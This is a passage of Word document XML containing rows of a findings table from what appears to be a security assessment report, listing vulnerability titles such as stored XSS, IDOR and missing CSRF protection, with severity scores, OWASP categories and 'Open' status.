      <w:tr w:rsidR="009B7CCA" w14:paraId="75E76561"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C9A94A8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</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45CF84" w14:textId="15433BC1"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025</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E36D6AA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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78D61E2F"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950D687" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.2</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42D0C9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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507D65" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6916E38F"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9292456" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</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A63D8E0" w14:textId="036203EF"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024</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383D6D9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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23D63BFE"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C84E2C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.2</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B6BD216" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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267899B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0D917510"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E24E680" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12</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8AB9883" w14:textId="6E1D25EE"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023</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A06B587" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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7E6ED102"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C55392D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0</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7F7280" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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0587BC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1965F6CE"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0448C5B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>13</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0C9329D" w14:textId="47465178"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022</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1A76350" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host Header Injection</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4D99C955"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FCD9BF2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8</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DE45321"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B55E604" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="75F473CD"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7B9FE05" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14</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5530712" w14:textId="117D082D"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021</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D42FDC1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated JavaScript Libra...</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1E0DA224"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120E6E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1</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BC05326" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable an...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42B3B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1EFEC642"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E0B6BE5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15</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73703BC" w14:textId="53517605"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-017</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4973170" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated JavaScript Libra...</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67509656"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9A45CCD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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188EC1A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable an...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D6942A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3429B84F"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F0891E4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16</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6D1AF57" w14:textId="0B84695B"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-015</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540A2CD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Information Disclosure via Directory Lis...</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7BB27899"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8C97587" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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3AE7DE8"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820FA28" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="53850891"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F907821" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17</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45D6421" w14:textId="7FE0C937"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-013</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DD70D2C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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2E2119E4"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6EB0F8D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.7</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2C07841" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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D21BE5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4DE09528"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A67D91" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>18</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B2BE3D0" w14:textId="69C5CC22"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-012</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CF8EFC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lack of Malware Scanning for Uploaded Fi...</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5EAD2D04"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A4D9A1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8</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33DD3E6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A08:2021-Software and ...</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5F6F34C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="09E645AB"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BC7049C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19</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08AFC9" w14:textId="648AA728"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-010</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4C8710" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Improper HTTP Method Enforcement</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5FE650DE"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1B94F9C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.6</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2FC9EB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Desi...</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D6229B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0240E8A7"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20B66D8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>20</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A754F5F" w14:textId="28BAB0AE"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-009</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72E6B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Cross-Site Request Forgery (CSRF...</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200A20AC"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F943BAE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.3</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C249D8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A08:2021-Software and ...</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C97AFD3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0D5822F6"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F2A0E96" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21</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B7E41A5" w14:textId="5A4D36C7"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-007</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5A94DC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Insecure Direct Object Reference (IDOR) ...</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1B19A848"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2599598" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.1</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1CCADFB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A01:2021-Broken Access...</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43B2DC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="61CC118D"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941DE8F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22</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F03C75A" w14:textId="02AE73F9"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-006</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F039267" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data Exposure in URL (GET </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Requ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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17143091"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C97F886" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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D262251" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A07:2021-Identificatio...</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AFF5E28" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3D579C8F"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CA3326" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</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4192C59" w14:textId="1BB883FC"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-005</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4C70967" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing X-Frame-Options Header (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clickjac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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12C0A1AB"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306CA4F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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68BDA1E"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E3B8B31" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4301899E"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51DF7E8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>24</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9BC76F1" w14:textId="348E833F"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-004</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E2BD876" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unrestricted Access to HTTP Service (Por...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DC2626"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="531C09B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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5ACE1E7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.4</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4635EDF"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33B3F8A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="082D4657"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D094F3C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>25</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9318CA8" w14:textId="58042F14"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032</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CEDFD65" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Information Disclosure via Oracle Report...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
